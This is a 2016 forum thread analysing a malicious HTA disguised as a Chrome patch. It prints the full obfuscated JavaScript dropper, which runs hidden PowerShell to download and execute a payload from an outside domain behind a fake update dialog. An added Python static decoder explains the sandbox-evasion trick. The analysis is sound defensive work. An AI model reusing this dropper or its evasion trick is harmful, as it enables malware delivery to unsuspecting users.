
Malware analysis: chrоmе_patch_1470326241.hta

13 replies to this topic

#1 FungiFreak

Posted 05 August 2016 - 11:15 AM

Last night Chrome caught an automated download titled chrоmе_patch_1470326241.hta. It was flagged as suspicious by Chrome.

Being curious, I decided to take a look at the code, but I could not decipher what the app attempts to do. A Google search shows almost nothing about this file.

Any clue what this script attempts to do, or tips on how to de-obfuscate the code pasted below?


<script>
    var zmtoh = 'twrfyw w{xmmopvwejTgoc(w-j1p0z0n,l-a1z0e0c)f;brjewsjizzuehTnom(d0s,j0a)q;v qan=fnwepwb gAfcbttirvcetXvOebyjweocvtg(o\'pWosbcbrsiupkts.kSghjexlllf\'n)n;l saoxeik=qSytfrvixncgk.sfiryohmwCzhiaortCtohdeea(q9b2l)v;oay.gRhunnl(r"ePjowwaegrzSkhzehlilg d-iWpisncdiozwgSitqyiluel wHtisdedgeenw k$odt=k$vesnvvu:zteeamdpm+q[wcphzavrv]h[lbeyctxeb]v9q2f+b\'uhcgm8j9v2x4e3n8sgz';
    var ffyuwx = 'hn2wfa3rdj.qenxyep\'j;u(xNveywz-tOzbvjjefcwte hSjynsdtgesmr.yNreftv.sWweebiCkldiyetnytw)p.xDvoiwxnqlrodandvFkiwljeo(d\'chftbtupksx:m/h/bevirmfotolleepbalbolgigyecra.bnqewtm/n1g7a/q5i2g4s.cdrapto\'y,r$kdq)w;eSbtaaurctc-fPlraoiclecsysi p$ldo;q[bSxywsutzenmj.oRmeafylcexccteiyowng.aAcsrsbekmdbeljym]t:v:bLkoxaydgWrixtuhaPmahrbtkijaylnNnawmjeu(w\'mSmyysxtqecmh.cWvicne';
    var hyqogb = 'dfoawcsm.rFzohrsmlsp\'t)w;y[rsjymsottehml.gwtijnddkolwlsn.hfnorrnmnst.amfetshsyafgwerbbovxj]l:i:xsfhpoiwl(j\'rUpptddaatgek ncxoxmbprlyehtkef.f\'p,c\'xIrnyfgocrhmeahtximosng\'e,h[aWhihnhdsovwfsq.xFwooremgsu.kMwexshsnawgoeqBdosxxBauetqthojnysh]r:g:pOkKb,u a[zSrypsetyekmo.uWhiwniddokwysh.cFwoirhmmsp.rMkexsisqangsesBhotxrIycjownx]t:k:rIanhfaoerrmyamttiuounb)h;k"s,s0h';
    var fpf = ',afjaultsbec)n;tvbawrp ybp=anqeqwh qAucztpihvtekXbOubrjlencktt(n\'tSochrviqpvtpirnrgf.qFgiglgexSoyxsstnemmzOgbwjaebcotm\'o)y;fvcasrt kpo k=f ddcowciusmdepnyta.dlvoscqaitrixoens.yhtreenfs;kpp k=e auynpefsccrabplej(fpa.isfudbesyturm(q8r)r)i;qikfn e(cby.uFnidluemEsxziosjtbsz(spg)a)abm.dDfeklxertaepFiijlget(wpl)w;v f k}y zcwaqtzckhz a(kes)h k{t}u ocyleomspef(b)y;p';
    var acbgwfvez = zmtoh + ffyuwx + hyqogb + fpf;
    var dbambjaiuz = "";
    var jhxxtqutjj = 2;
    var a = 0;
    try {
        window.drpoctg();
        a = 100000;
    } catch (e) {}
    while (a < acbgwfvez.length) {
        dbambjaiuz += acbgwfvez.charAt(a);
        a += jhxxtqutjj;
    };
    klpiqlmqm = "ev".concat("al");
    window[klpiqlmqm](dbambjaiuz);
</script>!G'T+L'P-NxksL1cn[/5>8_"w-s(9fNZ^=P*87.gg$pQ^XkSR?GtjZH'>t6Af+6*Soq]y]b[n8$"WFiYx@
<T?`y*tuzg(Ga7RRZ-B#33N*)()&TMsy0Pyq^>6^>M:5oyf@*L

Edited by FungiFreak, 05 August 2016 - 03:58 PM.
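A static decoder for the obfuscation scheme in the posted .hta, added here as an example and not code from the thread: it copies the script body out of the HTA, joins the string fragments in the script's own concatenation order, resolves the stride the loop uses, and walks the string without ever evaluating it. The sample HTA, its variable names and the probe name `chkenv` are constructed, benign stand-ins for the real fragments.

```python
import re

# Constructed, benign .hta in the same shape as the posted sample: string fragments
# whose every second character is real code, concatenated, walked with a stride,
# then handed to eval. (Constructed for this example, not the thread's sample.)
SAMPLE_HTA = """<html><head><script>
    var p1 = 'dqowceurmteynuti.otpiats';
    var p2 = 'ldef=g"hdjekclozdxecdv"b;n';
    var blob = p1 + p2; var out = ""; var step = 2; var a = 0;
    try { window.chkenv(); a = 100000; } catch (e) {}
    while (a < blob.length) { out += blob.charAt(a); a += step; };
    k = "ev".concat("al"); window[k](out);
</script></head></html>"""

def extract_script(hta):
    """Copy everything between the <script> tags, as advised in the thread."""
    return re.search(r"<script[^>]*>(.*?)</script>", hta, re.S | re.I).group(1)

def string_vars(script):
    """Map each single-quoted 'var x = ...;' literal to its value, unescaping \\'."""
    lits = re.finditer(r"var\s+(\w+)\s*=\s*'((?:\\.|[^'\\])*)'\s*;", script)
    return {m.group(1): m.group(2).replace("\\'", "'") for m in lits}

def joined_blob(script, strings):
    """Follow the 'var x = a + b + c;' line so fragments join in the script's order."""
    expr = re.search(r"var\s+\w+\s*=\s*(\w+(?:\s*\+\s*\w+)+)\s*;", script).group(1)
    return "".join(strings[n.strip()] for n in expr.split("+"))

def find_stride(script):
    """The loop advances with 'a += <name>;'; resolve <name> to its number."""
    name = re.search(r"\+=\s*(\w+)\s*;", script).group(1)
    if name.isdigit():
        return int(name)
    return int(re.search(r"var\s+%s\s*=\s*(\d+)\s*;" % re.escape(name), script).group(1))

def probe_function(script):
    """Name of the undefined function in the try block: a real engine throws and
    decoding proceeds; a sandbox that stubs every call jumps the counter past
    the end and decodes nothing, so stub nothing when emulating this."""
    m = re.search(r"try\s*\{\s*window\.(\w+)\(\)", script)
    return m.group(1) if m else None

def deobfuscate(hta):
    """Static decode: repeat the script's character walk without evaluating it."""
    script = extract_script(hta)
    blob = joined_blob(script, string_vars(script))
    return blob[::find_stride(script)]  # starts at index 0, as 'var a = 0' does
```

Run against the posted sample the same functions yield the PowerShell command line that the replies below describe; the decoded text is data to read, never something to execute.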



#2 Aura

Posted 05 August 2016 - 12:33 PM

I'm quite new to malware analysis, but it seems to download this file:
https://eimooleblogger.net/17/524.dat
However it is currently unavailable.

Edit: Also a search on the website returns a lot of results including VirusTotal, Hybrid-Analysis, etc. mostly for Google and Firefox patches, so the domain is indeed fishy.

https://www.google.ca/search?q="https%3A%2F%2Feimooleblogger.net%2F17%2F524.dat"&oq="https%3A%2F%2Feimooleblogger.net%2F17%2F524.dat"&aqs=chrome..69i57.647j0j4&sourceid=chrome&ie=UTF-8#q="eimooleblogger.net"

Full dump (done really quickly): (screenshot not preserved)

From what I understand, executing that .hta will launch a PowerShell process to download the payload mentioned above and execute it. To hide this, it'll display a small window saying "Update complete" with two buttons, "Ok" and "Information", that will probably do nothing.

Edited by Aura, 05 August 2016 - 01:11 PM.

Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 Didier Stevens

Posted 06 August 2016 - 03:20 AM

From what I understand, executing that .hta will launch a PowerShell process to download the payload mentioned above and execute it. To hide this, it'll display a small window saying "Update complete" with two buttons, "Ok" and "Information", that will probably do nothing.

Correct.

You can use http://deobfuscatejavascript.com to help you analyze JavaScript.


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"


#4 Aura

Posted 06 August 2016 - 10:20 AM

I tried that website and it doesn't seem to work. I click on the "Deobfuscate" button and nothing happens. Tried in Google Chrome, Internet Explorer and Microsoft Edge.


#5 Didier Stevens

Posted 06 August 2016 - 11:14 AM

I did it with the sample of the OP and it works. Mind you, the sample is an HTA (HTML Application), so I extracted the JavaScript script and copied that into the form on the website.

Extracting the script is simple: just copy everything between the <script> ... </script> tags.



#6 Aura

Posted 06 August 2016 - 11:18 AM

Now it works... I tried with other JavaScript scripts before and it didn't work, no idea why. Maybe I'm doing something wrong.


#7 Didier Stevens

Posted 06 August 2016 - 11:26 AM

No, sometimes it's not able to deobfuscate, and then nothing changes...



#8 Aura

Posted 06 August 2016 - 11:27 AM

Ah alright. I tried it with another JavaScript snippet I have and it worked. I guess it depends on the obfuscation method used.



#9 FungiFreak (Topic Starter)

Posted 06 August 2016 - 01:06 PM

Thanks for the responses.

I initially came here because the online obfuscation tools did not work for me either; however, omitting the <script> tags and anything not contained within did the trick.

I was going to download the payload onto a virtual machine to investigate further, but by that time the files were non-existent, and now the site fails to resolve and returns NXDOMAIN.

#10 Didier Stevens

Posted 06 August 2016 - 03:26 PM

You're welcome.

I searched on VirusTotal, but there was no sample of the downloaded file, only a 404 HTML file.



#11 lingroot

Posted 10 August 2016 - 11:25 PM

I'm quite new to malware analysis, but it seems to download this file:

https://eimooleblogger.net/17/524.dat
However it is currently unavailable.

Edit: Also a search on the website returns a lot of results including VirusTotal, Hybrid-Analysis, etc. mostly for Google and Firefox patches, so the domain is indeed fishy.

https://www.google.ca/search?q="https%3A%2F%2Feimooleblogger.net%2F17%2F524.dat"&oq="https%3A%2F%2Feimooleblogger.net%2F17%2F524.dat"&aqs=chrome..69i57.647j0j4&sourceid=chrome&ie=UTF-8#q="eimooleblogger.net"

Full dump (done really quickly): (screenshot not preserved)

From what I understand, executing that .hta will launch a PowerShell process to download the payload mentioned above and execute it. To hide this, it'll display a small window saying "Update complete" with two buttons, "Ok" and "Information", that will probably do nothing.

eimoolerbloegger.net from a secured systn and

Nice decryption. If possible, please report that blog.



#12 lingroot

Posted 10 August 2016 - 11:26 PM

You're welcome.

I searched on VirusTotal, but there was no sample of the downloaded file, only a 404 HTML file.

Most probably they removed it.



#13 Aura

Posted 11 August 2016 - 06:59 AM

The website seems offline, so it might have been reported already. Also, it seems that this .hta could be related to this .js.

http://www.bleepingcomputer.com/forums/t/622929/why-are-antivirus-programs-so-slow-to-flag-malware

Notice the payload path and name on the website.



#14 Didier Stevens

Posted 11 August 2016 - 12:54 PM

You're welcome.

I searched on VirusTotal, but there was no sample of the downloaded file, only a 404 HTML file.

Most probably they removed it.

No, it's unlikely that VirusTotal would remove the sample.
